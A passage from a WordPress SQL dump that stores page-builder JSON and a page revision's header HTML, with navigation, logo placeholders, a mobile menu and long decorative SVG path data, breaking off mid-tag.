Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}},{\"name\":\"hop-button\",\"parentId\":\"22-h29\",\"id\":\"22-h39\",\"partialId\":22,\"styleRef\":679,\"type\":\"header\",\"props\":{\"text\":\"Learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',23,'https://gsudice.dataconn.net/?p=1319',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1320,1,'2022-05-03 13:33:38','2022-05-03 17:33:38','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path 